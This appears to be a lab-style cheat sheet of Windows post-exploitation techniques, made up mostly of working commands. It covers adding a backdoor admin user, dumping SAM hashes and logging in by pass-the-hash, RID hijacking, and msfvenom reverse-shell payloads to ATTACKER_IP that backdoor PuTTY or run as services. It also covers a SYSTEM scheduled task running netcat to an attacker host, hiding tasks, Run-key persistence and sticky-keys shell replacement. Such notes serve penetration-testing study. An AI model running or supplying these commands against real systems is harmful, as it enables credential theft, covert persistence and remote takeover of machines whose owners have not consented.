# Add to adminnet localgroup administrators oscar42 /add# Add to backup operators. Can read/write any mem location or regnet localgroup "Backup Operators" oscar42 /add# Allow RDP for backup operators net localgroup "Remote Management Users" oscar42 /add# Disable LocalAccountTokenFilterPolicy to allow use of remote adminreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
Conn to group using Evil-WinRM
# Connect to boxevil-winrm-i10.10.0.1-uoscar42-pPassword321# Check Groups whoami/groups# Download for secrets dumpregsavehklm\systemsystem.bakregsavehklm\samsam.bakdownloadsystem.bakdownloadsam.bak# Dump hashes using Impacketpython3.9/opt/impacket/examples/secretsdump.py-samsam.bak-systemsystem.bakLOCAL# Login using admin hash (last part of hashdump)evil-winrm-i10.10.0.1-uAdministrator-H1cea1d7e8899f69e89088c4cb4bbdaa3
The user can read any file in the system, ignoring any DACL in place.
SeRestorePrivilege
The user can write any file in the system, ignoring any DACL in place.
# Export current configsecedit /export /cfg config.inf# Add user to lines in configSeBackupPrivilege =*S-1-5-32-544,*S-1-5-32-551,oscar42SeRestorePrivilege =*S-1-5-32-544,*S-1-5-32-551,oscar42# Convert modified file to DB and load it to syssecedit /import /cfg config.inf /db config.sdbsecedit /configure /db config.sdb /cfg config.inf# To allow RDP, Open GUI, Add oscar42 user, Allow Full controll permissionSet-PSSessionConfiguration-Name Microsoft.PowerShell -showSecurityDescriptorUI# You can now connect to Winrmevil-winrm -i 10.10.0.1-u oscar42 -p Password321
Relative ID (RID) Hijacking
# List RIDs of all userswmic useraccount get name,sid
>> wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
Guest S-1-5-21-1966530601-3185510712-10604624-501
oscar42 S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount S-1-5-21-1966530601-3185510712-10604624-504
The important bit is the 1010 at the end of the SID for the user oscar42. This is the RID, and we need to change it to the same value as the administrator, 500.
# open regedit as System using PSEXEC
PsExec64.exe -i -s regedit
Now we need to modify the HKLM\SAM\SAM\Domains\Account\Users\ key for the user we want to elevate. Convert the RID to HEX to find the user. In this case, 1010 converts to 0x3f2.
Modify the F key to have the admins bytes, 0x1f4 with the byte order reversed.
Backdooring Files
Using MSFVenom
# Add a backdoor to Putty that executes a payload on runmsfvenom-ax64--platformwindows-xputty.exe-k-pwindows/x64/shell_reverse_tcplhost=ATTACKER_IPlport=4444-b"\x00"-fexe-oputtyX.exe
Hijacking File Extensions
File extensions are located at HKLM\Software\Classes\. We can then select a extension. Selecting the .txt extension reveals a link to the class txtfile. We can then change the command ran when opening this file type at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
we can then save this script to c:\Windows\system32\backdoor.ps1, and change the reg key to powershell -windowstyle hidden C:\windows\system32\backdoor2.ps1 %1. Opening any .txt file will now execute our payload.
Services
Auto change admin pass
This will create a service that changes the admin password to passwd123 on startup.
# Creates a malicious servicemsfvenom-pwindows/x64/shell_reverse_tcpLHOST=ATTACKER_IPLPORT=4448-fexe-service-orev-svc.exe
On the target machine:
# After dropping the exe into C:\Windows\sc.exe create malService binPath="C:\windows\rev-svc.exe" start= autosc.exe start malService
Service hijacking
# List all services. We want to look for a stopped service to avoid# detection from a AV monitoring servicessc.exe query state=all# Query for information on a discovered servicesc.exe qc service1# Change binary path for service sc.exe config service1 binPath="C:\Windows\rev-svc2.exe" start= auto obj="LocalSystem"# now you can either wait for the service to start itself, or start it manually withsc.exe start service1
Task Scheduler
# Create a task to establish a connection every minschtasks /create /sc minute /mo 1/tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449"/ru SYSTEM# Check if task was created schtasks /query /tn taskbackdoor
Hide task
A task can be hidden by deleting its service descriptor (SD). Service descriptors can be viewed at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Next, select the service you created and delete the SD record for it.
Logon Triggered Persistence
Startup Folder
# Programs stored inC:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\# Will be ran on startup
Registry
# Create a REG_EXPAND_SZ in the registry path with a link to the applicationHKLM\Software\Microsoft\Windows\CurrentVersion\Run# Add a link to the exe after the comma in UserInitHKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\# Add a key called "UserInitMprLogonScript" with a path to the exeHKCU\Environment
Logon Screen
Stickeykeys
takeown /f c:\Windows\System32\sethc.exeicacls C:\Windows\System32\sethc.exe/grant Administrator:Fcopy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe# Shift 5 times at lockscreen will now pop a shell
Utilman
takeown /f c:\Windows\System32\Utilman.exeicacls C:\Windows\System32\Utilman.exe/grant Administrator:Fcopy c:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe# Pressing the accessability settings will now pop a shell
